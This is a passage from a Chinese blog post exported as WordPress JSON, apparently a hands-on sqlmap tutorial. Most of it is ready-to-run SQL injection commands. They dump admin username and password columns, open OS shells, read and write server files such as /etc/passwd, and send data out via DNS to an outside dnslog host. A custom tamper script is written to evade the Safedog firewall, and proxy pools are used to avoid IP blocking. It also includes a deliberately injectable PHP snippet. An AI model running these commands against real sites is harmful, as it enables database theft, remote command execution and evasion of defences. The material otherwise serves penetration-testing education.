sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D --random-agent<\/code><\/p>\n
\u8bbe\u7f6e\u8d85\u65f6\u65f6\u95f4<\/h2>\n
–time-out \u8fd9\u4e2a\u53c2\u6570\u662f\u8bbe\u7f6e\u8d85\u65f6\u65f6\u95f4 \u6709\u5f97\u7f51\u9875\u54cd\u5e94\u6bd4\u8f83\u6162\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u6765\u589e\u5927\u8bbf\u95ee\u8d85\u65f6\u7684\u65f6\u95f4\u3002\u9ed8\u8ba4\u662f30<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D pikachu --timeout=10<\/code><\/p>\n
\u8bfb\u53d6\u6587\u672c\u8fdb\u884cSQL\u6ce8\u5165\u68c0\u6d4b<\/h2>\n
sqlmap -r post.txt<\/p>\n
sqlmap -r post.txt –batch<\/p>\n
POST \/06\/vul\/sqli\/sqli_id.php HTTP\/1.1\nHost: 192.168.0.103\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko\/20100101 Firefox\/89.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 30\nOrigin: http:\/\/192.168.0.103\nConnection: close\nReferer: http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php\nCookie: PHPSESSID=d2tc9ru7f1qdi44dvt8ecd2c95\nUpgrade-Insecure-Requests: 1\nid=1&submit=%E6%9F%A5%E8%AF%A2<\/code><\/pre>\n
\u6307\u5b9a\u53c2\u6570\u8fdb\u884c\u6ce8\u5165<\/h2>\n
-p \u6307\u5b9a\u9700\u8981\u6d4b\u8bd5\u7684\u53c2\u6570<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" -p name --dbmsmysql -v 1<\/code><\/p>\n
\u4f7f\u7528*\u8fdb\u884c\u6ce8\u5165<\/p>\n
\u5982\u679curl\u662f\u4f2a\u9759\u6001\u7684\u65f6 \uff0c\u53ef\u4ee5\u4f7f\u7528*\u53f7\u8868\u793a\u8fd9\u662f\u68c0\u6d4b\u7684\u5730\u65b9<\/p>\n
sqlmap -u "http:\/\/192.168.0.103\/06\/vul\/sqli\/id\/1*.\/html<\/a><\/p>\n
POST\u6ce8\u5165<\/p>\n
sqlmap -u http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php<\/a> –data "id=1&submit=%E6%9F%A5%E8%AF%A2" -p id -v 1<\/p>\n
cookie\u6ce8\u5165<\/p>\n
–cookie \u8f93\u5165cookie\u7684\u8bf7\u6c42\u53c2\u6570<\/p>\n
–level 2\u6216\u8005\u4ee5\u4e0a\u624d\u8fdb\u884ccookie\u6ce8\u5165<\/p>\n
sqlmap.py -u \"http:\/\/192.168.87.129\/shownews.asp\" --cookie \"id=27\" --dump -T admin -C \"user,password\" --level 2<\/code><\/p>\n
SQLMAP\u5b9e\u6218\u4e09<\/h1>\n
\u4fee\u6539\u9ed8\u8ba4\u6700\u5927\u7ebf\u7a0b<\/h2>\n
lib\/core\/settings.py<\/p>\n
\u9ed8\u8ba4\u6700\u5927\u7ebf\u7a0b\u662f10 \u53ef\u4ee5\u8bbe\u7f6e\u7ebf\u7a0b\u6700\u5927\u4e3a100<\/p>\n
MAX_NUMBER_OF_THREADS = 100<\/code><\/p>\n
\u4fee\u6539\u9ed8\u8ba4\u7684\u6d4f\u89c8\u5668<\/h2>\n
agent = Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko\/20100101 Firefox\/16.0<\/code><\/p>\n
\u4f7f\u7528\u914d\u7f6e\u6587\u4ef6\u68c0\u6d4b<\/p>\n
python sqlmap.py -C sqlmap.conf -u \"http:\/\/www.baidu.com\/moonsec.php?id=1\"<\/code><\/p>\n
sqlmap\u4f7f\u7528<\/p>\n
SQLMAP\u7ed5\u8fc7\u9632\u706b\u5899\u62e6\u622a<\/h1>\n
\u76ee\u524d\u5f88\u591a\u7f51\u7ad9\u90fd\u4f7f\u7528waf\u5bf9\u7f51\u7ad9\u8fdb\u884c\u4fdd\u62a4\uff0c\u5728\u6e17\u900f\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\uff0c\u5f88\u591a\u7684\u64cd\u4f5c\u90fd\u4f1a\u88ab\u62e6\u622a\uff0c\u5728\u6d4b\u8bd5SQL\u6ce8\u5165\u65f6\uff0cwaf\u4f1a\u5bf9\u8bf7\u6c42\u8fc7\u6765\u7684\u6d41\u91cf\u8fdb\u884c\u62e6\u622a\uff0c\u5bfc\u81f4SQLMAP\u8bf7\u6c42\u7684\u5185\u5bb9\u65e0\u6cd5\u5230\u8fbe\u76ee\u6807\uff0cSQLMAP\u65e0\u6cd5\u5224\u65ad\u76ee\u6807\u662f\u5426\u5b58\u5728\u6ce8\u5165\uff0cwaf\u5bf9\u6076\u610f\u7684\u653b\u51fb\u8bf7\u6c42\u8fdb\u884c\u62e6\u622a\uff0c\u62e6\u622a\u4f1a\u62c9\u5165\u9ed1\u540d\u5355\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u8bbf\u95ee\u4e0d\u5230\u76ee\u6807\u3002\u65e0\u6cd5\u8fdb\u884c\u5b89\u5168\u68c0\u6d4b\u3002<\/p>\n
sqlmap\u4f7f\u7528–tamper\u547d\u4ee4 \u9009\u62e9\u5408\u9002\u7684\u811a\u672c\u5bf9waf\u8fdb\u884c\u7ed5\u8fc7<\/p>\n
sqlmap.py -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" -p name --dbmsmysql --tamper \"space2comment\" -v 3 --dbs<\/code><\/p>\n
\u5bbd\u5b57\u8282\u6ce8\u5165<\/h2>\n
unmagicquotes.py<\/p>\n
sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-32\/?id=1\" --dbms mysql --tamper \"unmagicquotes.py\" -v 4<\/code><\/p>\n
base64\u6ce8\u5165<\/p>\n
sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-21\/index.php\" --cookie=\"uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\" --param-del=\";\" --dbms mysql --tamper \"base64encode.py\" -v 4 --level 3<\/code><\/p>\n
GET \/Less-21\/index.php HTTP\/1.1\nHost: 192.168.0.136:7766\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko\/20100101 Firefox\/89.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nReferer: http:\/\/192.168.0.136:7766\/Less-21\/?id=1\nConnection: close\nCookie: uname=YWRtaW4%3D; PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0<\/code><\/pre>\n
sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-21\/index.php\" --cookie=\"uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\" --dbms mysql --tamper \"base64encode.py\" -v 1 --level 3<\/code><\/p>\n
–param-del=";" \u7528;\u5206\u5272\u53c2\u6570<\/p>\n
sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-21\/index.php\" --cookie=\"uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\" --param-del=\";\" --dbms mysql --tamper \"base64encode.py\" -v 4 --level 3<\/code><\/p>\n
tampter\u6a21\u5757\u5217\u8868<\/h2>\n
sqlmap –list-tampers<\/p>\n
\"1746432568644-9b602ae4-6f45-483a-91c5-4a7b8196d159.png\"<\/p>\n
\"1746432585919-54666ac4-8e7d-4bab-9b90-1efa95797956.png\"<\/p>\n
\"1746432595364-49ea7fa9-d0e1-4b60-815e-f3c097b13ab4.png\"<\/p>\n
\u8bbe\u7f6e\u7ebf\u7a0b\u5927\u5c0f<\/h2>\n
\u5728\u9047\u5230waf\u7684\u65f6\u5019\uff0c\u5982\u679c\u5e76\u53d1\u8fc7\u5927\uff0c\u4f1a\u8ba4\u4e3a\u662fcc\u653b\u51fb\uff0cip\u4f1a\u88ab\u5c01\u5835<\/p>\n
–threads=1 \u8bbe\u7f6e\u7ebf\u7a0b\u4e3a1<\/p>\n
\u8bbe\u7f6ehttp\u8bf7\u6c42\u5ef6\u65f6<\/h2>\n
–delay=DELAY \u8bbe\u7f6e\u6bcf\u4e2a HTTP \u8bf7\u6c42\u7684\u5ef6\u8fdf\u79d2\u6570<\/p>\n
\u4f7f\u7528\u4ee3\u7406\u6ce8\u5165<\/h2>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" -p name --dbmsmysql -v 1 --proxy=http:\/\/123.73.63.6:46603<\/code><\/p>\n
\u4f7f\u7528\u4ee3\u7406\u6c60\u6ce8\u5165<\/h2>\n
\u8d2d\u4e70\u4ee3\u7406\u6c60\u4e4b\u540e \u83b7\u53d6\u4ee3\u7406 \u4fdd\u5b58\u5230\u6587\u4ef6\u5185<\/p>\n
\nproxy.txt<\/span><\/summary>\n
123.73.208.166:46603<\/span><\/p>\n
123.73.63.29:46603<\/span><\/p>\n
123.73.63.84:46603<\/span><\/p>\n
112.123.40.42:40806<\/span><\/p>\n
183.47.94.248:38090<\/span><\/p>\n
121.237.149.88:13804<\/span><\/p>\n
114.99.108.71:23359<\/span><\/p>\n
123.73.209.246:46603<\/span><\/p>\n
123.73.63.132:46603<\/span><\/p>\n
119.55.253.202:39730<\/span><\/p>\n<\/details>\n
–proxy-file \u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7d\u4ee3\u7406\u5217\u8868<\/p>\n
sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-32\/?id=1\" --dbms mysql --tamper \"unmagicquotes.py\" -v 1 --proxy-file=proxy.txt<\/code><\/p>\n
SQLMAP\u547d\u4ee4\u6267\u884c \u6587\u4ef6\u8bfb\u5199 dns\u76f2\u6ce8<\/h1>\n
sqlmap\u547d\u4ee4\u6267\u884c<\/h2>\n
–os-cmd=OSCMD \u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/p>\n
–os-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f\u64cd\u4f5c\u7cfb\u7edf shell<\/p>\n
\u6ce8\u5165\u70b9\u7684\u5f53\u524d\u7528\u6237\u662fdba\u65f6\uff0c\u4f7f\u7528\u4ee5\u4e0a\u4e24\u4e2a\u547d\u4ee4\uff0c\u4e00\u4e2a\u662f\u6267\u884c\u547d\u4ee4\uff0c\u4e00\u4e2a\u662f\u8c03\u7528\u4ea4\u4e92\u64cd\u4f5c\u7cfb\u7edfshell<\/p>\n
sqlmap -u "http:\/\/www.dm1.com\/inj.aspx?id=1<\/a>" -v 1 –os-cmd="net user"<\/p>\n
sqlmap -u "http:\/\/www.dm1.com\/inj.aspx?id=1<\/a>" -v 1 –os-shell<\/p>\n
\u4f7f\u7528–os-shell\u547d\u4ee4\u4f1a\u5f39\u51fa\u4e00\u4e2a\u4ea4\u4e92shell\u7684\u754c\u9762 \u53ef\u4ee5\u5728\u5176\u8f93\u5165\u547d\u4ee4\uff0c\u5982\u679c\u53ef\u4ee5\u56de\u663e\u5c31\u4f1a\u8fd4\u56de\u547d\u4ee4\u6267\u884c\u7684\u4fe1\u606f<\/p>\n
\u8bfb\u53d6\u548c\u5199\u5165\u6587\u4ef6<\/h2>\n
–file-read \u8bfb\u53d6\u6587\u4ef6 \u8bfb\u53d6\u6587\u4ef6\u9996\u5148\u8981\u77e5\u9053\u8def\u5f84,\u624d\u80fd\u8bfb\u53d6<\/p>\n
sqlmap -u \"http:\/\/www.dm1.com\/inj.aspx?id=1\" -v 1 --file-read=\"C:\/Windows\/System32\/inetsrv\/MetaBase.xml\" --threads=10<\/code><\/p>\n
C:\/Windows\/System32\/inetsrv\/MetaBase.xml \u53ef\u4ee5\u6362\u6210\u5176\u4ed6\u6587\u4ef6\u8def\u5f84 \u5982\u679c\u662flinux \u53ef\u4ee5\u8bfb\u53d6\/etc\/passwd<\/p>\n
–file-write \u5199\u5165\u6587\u4ef6<\/p>\n
–file-write \u76ee\u6807\u8def\u5f84 –file-dest \u6587\u4ef6\u8def\u5f84<\/p>\n
sqlmap -u \"http:\/\/www.dm1.com\/inj.aspx?id=1\" -v 1 --file-write D:1.txt --file-dest C:Hws.comHwsHostMasterwwwrootdm1.comweb1.txt<\/code><\/p>\n
sqlmap dnslog\u6ce8\u5165<\/h2>\n
\u8fd9\u79cd\u60c5\u51b5\u9002\u5408\u4f7f\u7528\u6ca1\u6709\u56de\u663e\u7684\u65f6\uff0c\u4f7f\u7528\u6ce8\u5165\u628a\u6570\u636e\u53d1\u9001\u5230\u8fdc\u7a0bdnslog\u4e0a\u3002<\/p>\n
–sql-shell \u8c03\u7528 sql\u4ea4\u4e92shell<\/p>\n
declare @s varchar(5000),@host varchar(5000) set @s=(host_name()) set@host=CONVERT(varchar(5000),@s)+'.2kbg3j.dnslog.cn';EXEC('master..xp_dirtree \"\\'+@host+'foobar$\"')<\/code><\/p>\n
\"1746432792954-2583bccf-3930-4e00-bfed-ae5e6e3d1bec.png\"<\/p>\n
sqlmap –dns-domain \u6ce8\u5165<\/h2>\n
\u5982\u679c\u76ee\u6807\u5b58\u5728\u6ce8\u5165\uff0c\u4f7f\u7528\u65f6\u95f4\u6ce8\u5165\u7684\u65f6\uff0c\u901f\u5ea6\u8fc7\u6162\uff0c\u53ef\u4ee5\u4f7f\u7528dnslog\u6ce8\u5165<\/p>\n
\u9996\u5148\u51c6\u5907\u4e24\u4e2a\u57df\u540d readteam.club 1377day.com<\/p>\n
readteam.club \u8fd9\u4e2a\u662f\u963f\u91cc\u4e91\u7684\u57df\u540d \u6dfb\u52a0\u4e09\u6761\u8bb0\u5f55 \u5206\u522b\u662f* \u3001ns1\u3001 ns2<\/p>\n
\"1746432817432-9694c6d5-4871-460c-8e0d-dd1e23bbfd06.png\"<\/p>\n
1377day.com \u8bbe\u7f6e dns\u670d\u52a1\u670d\u52a1\u4e3a ns1.readteam.club ns2.readteam.club\"1746432825501-8315fed8-4df1-4cbf-8640-813716a38ab4.png\"<\/p>\n
\u5728sqlmap\u670d\u52a1\u5668\u4e0a\u76d1\u542c53\u7aef\u53e3<\/p>\n
tcpdump -n port 53<\/p>\n
ping www.1377day.com<\/p>\n
\"1746432834917-66a84310-dcd9-42a4-9a14-acd7c12e7b93.png\"\u8fd9\u4e2a\u662f\u5b58\u5728\u76f2\u6ce8\u5165\u7684php\u4ee3\u7801<\/p>\n
<?php\n$servername = \"localhost\";\n$username = \"root\";\n$password = \"oCFWyfGnz8gcWuWv\";\n$dbame=\"x_pt7_site\";\n\/\/ Create connection\n$conn = new mysqli($servername, $username, $password);\n\/\/ Check connection\nif ($conn->connect_error) {\ndie(\"Connection failed: \" . $conn->connect_error);\n}\n$conn->select_db(\"x_pt7_site\") or die(\"\u9009\u62e9\u6570\u636e\u5e93\u5931\u8d25\uff1a\".$conn->error);\n$id = $_GET['id'];\n$sql = \"select * from users where id=\".$id; \/\/ \u6570\u5b57\u578b\n$res =$conn->query($sql);\necho \"<br><br>\";\necho \"<br>\";\n\/*\nwhile($rows = $res->fetch_array()){\necho $rows['username'];\n}\n*\/\necho \"<b>\";\n?><\/code><\/pre>\n
\u8fd9\u4e2a\u547d\u4ee4\u5728sqlmap\u670d\u52a1\u5668\u4e0a\u6267\u884c<\/p>\n
python3 sqlmap.py -u http:\/\/s.pt7.site\/sql.php?id=1 --dbms mysql --technique=T --dns-domain=1377day.com -Dx_pt7_site --columns --batch<\/code><\/p>\n
\u53ef\u4ee5\u770b\u5230dns \u96a7\u9053\u901a\u4fe1\u6210\u529f\u3002\u76f2\u6ce8\u5165\u7684\u901f\u5ea6\u6bd4\u65f6\u95f4\u76f2\u6ce8\u5165\u5feb\u591a\u4e86\u3002<\/p>\n
\u7f16\u5199tamper\u6a21\u5757\u7ed5\u8fc7waf\u62e6\u622a\u7ee7\u7eed\u6ce8\u5165<\/h1>\n
\u9996\u5148\u5224\u65ad waf\u7684\u5382\u5546 \u65b0\u7248\u7684sqlmap\u4f1a\u81ea\u52a8\u53bb\u6267\u884cwaf\u68c0\u6d4b<\/p>\n
sqlmap -u http:\/\/www.p2.com\/inj.aspx?id=1<\/a> -v 1 –random-agent<\/p>\n
\u5728SQL\u6ce8\u5165\u4e2d\uff0c\u7ecf\u5e38\u6027\u4f1a\u9047\u5230\u5404\u79cd\u5382\u5546\u7684waf,\u7ed5\u8fc7\u4e4b\u540e\u7ecf\u5e38\u624b\u5de5\u63d0\u4ea4\uff0c\u8fd9\u6837\u663e\u5f97\u7279\u522b\u9a6c\u4e0a\uff0c\u7279\u522b\u662f\u8981\u6ce8\u5165\u5f97\u5230\u6570\u636e\u7684\u65f6\uff0c\u624b\u5de5\u83b7\u53d6\u7684\u4fe1\u606f\u592a<\/p>\n
\u6162\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u7528\u7f16\u5199sqlmap\u7684tamper\u6a21\u5757\u8fdb\u884c\u6ce8\u5165\uff0c\u81ea\u52a8\u5316\u8fdb\u884c\u64cd\u4f5c\uff0c\u8fd9\u6837\u5c31\u65b9\u4fbf\u5f97\u591a\u4e86\u3002<\/p>\n
\u9996\u5148\u5206\u6790\u5f97\u7ed5\u8fc7\u5b89\u5168\u72d7\u7684 payload<\/p>\n
–\/%0a\u8fd9\u91cc\u662f\u4f60\u7684\u586b\u5199\u4f60\u7684\u6ce8\u5165\u8bed\u53e5–%20<\/em>\/<\/p>\n
\u6ce8\u5165\u7684\u8bed\u53e5\u5728\u91cc\u9762\u4f1a\u6b63\u5e38\u6267\u884c\u88ab\u6267\u884c\u7684\u3002<\/p>\n
\u63a5\u7740\u6765\u5206\u6790\u4e00\u4e0btamper<\/p>\n
#!\/usr\/bin\/env python\n\"\"\"\nCopyright (c) 2006-2019 sqlmap developers (http:\/\/sqlmap.org\/)\nSee the file 'LICENSE' for copying permission\nAuthor:pureqh.top\n\"\"\"\nimport re\nimport os\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\n__priority__ = PRIORITY.LOW # \u4f18\u5148\u7ea7\u8bbe\u7f6e\ndef dependencies():\n    singleTimeWarnMessage(\"Bypass safedog by pureqh'%s' only %s\" % (os.path.basename(__file__).split(\".\")[0],\n                                                                    DBMS.MSSQL)) #\u63cf\u8ff0\n# tamper\u51fd\u6570\u4e3a\u81ea\u5b9a\u4e49\u4f60\u7684payload\ndef tamper(payload, **kwargs):\n    payload=payload.replace('AND','--\/*%0aAND')#\u5173\u952e\u8bcd\u66ff\u6362\npayload=payload.replace('ORDER','--\/*%0aORDER')\npayload=payload.replace('UNION','--\/*%0aunion')\npayload+='--%20*\/'#\u8ffd\u52a0\u5b57\u7b26\u4e32\nreturn payload #\u8fd4\u56de\u6700\u7ec8\u7684\u5b57\u7b26\u4e32<\/code><\/pre>\n
\u6267\u884c\u547d\u4ee4<\/p>\n
\u4f7f\u7528\u8054\u5408\u67e5\u8be2\u6ce8\u5165\u68c0\u6d4b\uff0c\u968f\u673a\u6d4f\u89c8\u5668 \u9ed8\u8ba4\u4f1a\u88ab\u5b89\u5168\u72d7\u62e6\u622a<\/p>\n
sqlmap.py -u http:\/\/www.p2.com\/inj.aspx?id=1<\/a> –dbms="MSSQL" –tamper bypass_safedog_msql.py -v 4 –flush-session –batch –tech=U –random-agent –dbs<\/p>\n
sqlmap \u66b4\u529b\u7a77\u4e3e\u8868\u5b57\u6bb5<\/h1>\n
\u5728access\u548cmysql4.0\u6570\u636e\u5e93 \u6ca1\u6709\u5185\u7f6e\u5e93\uff0c\u9488\u5bf9\u8fd9\u7c7b\u6570\u636e\u5e93sqlmap\u4f7f\u7528\u5b57\u5178\u7a77\u4e3e\u7684\u65b9\u6cd5\u5bf9\u8868\u8fdb\u884c\u731c\u89e3\u3002<\/p>\n
sqlmap\u5185\u7f6e\u8868\u548c\u5b57\u6bb5\u7684\u5b57\u5178<\/p>\n
\"1746434777352-0c005644-bfcb-4f21-8cc4-5a5790673b52.png\"<\/p>\n
sqlmap -u http:\/\/www.dm3.com\/Content.asp?id=9<\/a> –dbms access –threads=10 –tables<\/p>\n
\u5b58\u5728\u6ce8\u5165\u7cfb\u7edf\u4f1a\u8be2\u95ee\u4f60\u662f\u5426\u4f7f\u7528\u5b57\u6bb5\u8fdb\u884c\u731c\u89e3 \u9009\u62e91\u540e\u4f1a\u81ea\u52a8\u731c\u89e3<\/p>\n
\u5982\u679c\u731c\u89e3\u51fa\u6765 \u63a5\u7740\u731c\u89e3\u5b57\u6bb5<\/p>\n
sqlmap -u http:\/\/www.dm3.com\/Content.asp?id=9<\/a> –dbms access –threads=10 -T i_users –columns<\/p>\n
\u5982\u679c\u4f60\u77e5\u9053\u5b57\u6bb5\u548c\u8868\u540d\u53ef\u4ee5\u76f4\u63a5\u4e0d\u731c\u89e3 sqlmap\u81ea\u52a8\u8fdb\u884c\u6570\u636e\u83b7\u53d6<\/p>\n
sqlmap -u http:\/\/www.dm3.com\/Content.asp?id=9<\/a> –dbms access –threads=10 -T i_user -C "u_id,u_user,u_pass" –dump<\/p>\n
\"1746434813712-a04428fb-65f0-45aa-8fea-23b61ed04e4d.png\"<\/p>\n
\n
\u66f4\u65b0: 2025-05-05 16:48:01
\n\u539f\u6587: https:\/\/www.yuque.com\/yuhui.net\/network\/eql3mp504rodzg8d<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
SQLmap \u5b98\u7f51 https:\/\/sqlmap.org\/ sqlmap\u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u81ea\u52a8\u5316\u68c0\u6d4b\u548c\u5229\u7528SQL\u6ce8\u5165\u6f0f\u6d1e\u5e76\u63a5\u7ba1\u6570\u636e\u5e93\u670d\u52a1\u5668\u3002\u5b83\u6709\u4e00\u4e2a\u5f3a\u5927\u7684\u68c0\u6d4b\u5f15\u64ce\uff0c\u8bb8\u591a\u9002\u5408\u4e8e\u7ec8\u6781\u6e17\u900f\u6d4b\u8bd5\u7684\u826f\u597d\u7279\u6027\u548c\u4f17\u591a\u7684\u64cd\u4f5c\u9009\u9879\uff0c\u4ece\u6570\u636e\u5e93\u6307\u7eb9\u3001\u6570\u636e\u83b7\u53d6\u5230\u8bbf\u95ee\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf\u3001\u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4 kali \u81ea\u5e26 sqlmap \u66f4\u65b0sqlmap python sqlmap.py –update \u663e\u793a\u7ec8\u7aef\u5e2e\u52a9 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[121,119,2],"tags":[12,22,28,43,57],"class_list":["post-716","post","type-post","status-publish","format-standard","hentry","category-ceshigongju","category-shentouceshijichu-network_sec","category-network_sec","tag-12","tag-windows","tag-kali","tag-43","tag-python"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=716"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/716\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=716"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}